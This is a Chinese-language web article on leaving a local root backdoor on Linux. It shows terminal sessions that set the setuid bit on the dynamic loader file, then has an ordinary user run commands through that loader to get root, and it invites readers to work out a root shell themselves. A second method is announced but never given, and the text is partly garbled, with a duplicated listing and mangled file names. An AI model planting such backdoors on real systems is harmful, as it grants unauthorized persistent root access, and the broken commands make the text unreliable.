2024年6月9日发(作者:)
linux下留本地后门方法有哪些
Linux支持多用户,各个用户对于自己的文件设备有自己特殊的权利,保证了各用户
之间互不影响,有时为了便利或者某些安全需要,我们需要在本地留下后门,那么下面一
起看看linux下留本地后门的两个方法。
方法步骤
方法一:setuid的方法,其实8是很隐蔽。看看过程: [root@localdomain lib]# ls -
l |grep ld-linux lrwxrwxrwx 1 root root 9 2008-06-07 17:32 .2 ->
lrwxrwxrwx 1 root root 13 2008-06-07 17:47 .3 -> ld-linu
方法一:setuid的方法,其实8是很隐蔽。看看过程:
[root@localdomain lib]# ls -l |grep ld-linux
lrwxrwxrwx 1 root root 9 2008-06-07 17:32 .2 ->
lrwxrwxrwx 1 root root 13 2008-06-07 17:47 .3 -> .2
[root@localdomain lib]# chmod s .2
[root@localdomain lib]# ls -l |grep
-rwsr-sr-x 1 root root 128952 2007-10-18 04:49
lrwxrwxrwx 1 root root 9 2008-06-07 17:32 .2 ->
[root@localdomain lib]#
我们这里给/lib/.2这个文件(在FC8里,它指向这个文件)加了
setuid属性。然后我们看怎么利用它。
普通用户登录,测试下权限:
[xiaoyu@localdomain ~]$ whoami
xiaoyu
[xiaoyu@localdomain ~]$ /lib/.2 `which whoami`
root
[xiaoyu@localdomain ~]$
恩,嘿嘿 root了吧,具体怎么生成root shell,你们自己去想吧,凡事都不要点得太
透,对吧。呵呵,可以肯定的一点,/lib/.2 /bin/sh肯定生成不了rootshell,
bash检查euid 和uid,看是否相等...OK,不多说了。
方法二:
看过程:
发布者:admin,转转请注明出处:http://www.yc00.com/web/1717904124a2745187.html
评论列表(0条)